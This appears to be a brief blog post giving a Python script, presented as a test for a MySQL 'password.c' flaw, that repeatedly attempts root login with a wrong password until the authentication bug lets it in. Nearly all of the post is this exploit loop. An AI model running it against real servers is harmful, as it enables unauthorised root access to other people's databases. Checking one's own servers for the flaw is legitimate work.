Python Script to Test MySQL password.c hack
vi /root/MySQLByPass.py ========== #!/usr/bin/python import subprocess while 1: subprocess.Popen("mysql -u root mysql --password=xx",shell=True).wait() ========== python /root/MySQLByPass.py
Useful Links, Tips, Comments and general Ramblings on microservices, infrastructure as code, automation, big data and messaging.